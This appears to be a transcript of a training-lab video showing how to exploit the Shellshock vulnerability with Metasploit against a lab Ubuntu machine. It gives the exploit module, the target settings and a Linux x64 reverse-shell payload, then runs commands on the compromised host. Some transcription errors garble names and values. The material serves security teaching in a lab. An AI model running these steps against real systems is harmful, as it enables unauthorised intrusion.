Hi and welcome back. Thanks for joining me for video 3 of Lab 2, Analyze Types of Malware and Applications Attack. We're continuing on with section 1.2, using Metasploit to further exploit the shell shock vulnerability. In this section, we will use the vulnerability found in the last section and exploit it further in a Metasploit framework to gain access to the victim Ubuntu CRV machine. Now in your Kali virtual machine, you're going to click on terminal icon to start the terminal. So back up at the top, we're just going to open up the terminal. And in the terminal, we're going to type MSF CONSOLE. So that's MSF console. We're going to hit enter. Then once Metasploit framework is loaded, type search space Sherlock. So now it's loaded. I'm going to type at the bottom down here after MSF6. I'm typing in search, all lowercase, space SHELLSHOCK, and hit enter. The search will return a list of results: the exploit /multi/HTTP Apache _mod _CGI _bash _env _exec is the one we want. So we're going to type use one. So if you can see here on the left hand side, we have numbers that are obviously the different options. So we have 0, and then we have 1, exploit, multi, and so on that I had mentioned previously, and the name. That is why we're going to type in 1 after the MSF6. Sorry, use 1, and hit enter. Now it says on step 5, the Metasploit will load the module we just selected. Here we want to type show options to see what settings we can change. So at the bottom here, show options. Now we have the information. After examining the options, we understand that our host is the victim address, our port is the victim port, and target URI will be the vulnerable executable path on the website. So we will be changing these two options. So here's our host, our path, and target URI. So to make those change options, we're going to run the following commands in step 7. And the first one is we're going to set our host. Make sure you capitalize that. 192.168.0.6 and hit enter. Next, we're going to set the R port. /4444 and hit enter. And then next we're going to set the target URI /CGI-bin/vulnerable. And I can see a typo already. Fix that. And then make sure that looks correct and hit enter. Now in step 8, we will use the Linux reserve shell that targets 64-bit Linux operating systems. Here we change the payload by running the following command. Set space payload /Linux. This is the path. x64 /shell_reverse_TCP. Hit enter. Step 9. Next, type exploit to execute the attack the victim machine. Wait a couple of seconds. When it almost feels like the computer freezes, you can start by typing in who am I and pwd to execute commands on the victim system. So let's type that out, exploit. Hit enter. There we go. Run the commands. Now let's check to see who am I. Sorry, misspelling. Oh, did I misspell something earlier? Well, at least that's correct. Then we're going to hit exit. And exit again, because now we're exiting out of the MSF console. And we're right back from the start. This concludes our Lab 2 Section 2. Come back again. Our Lab 2 Section 1.2. Come back again where we'll finish up starting with Section 2 Rootkit vulnerabilities. Thank you.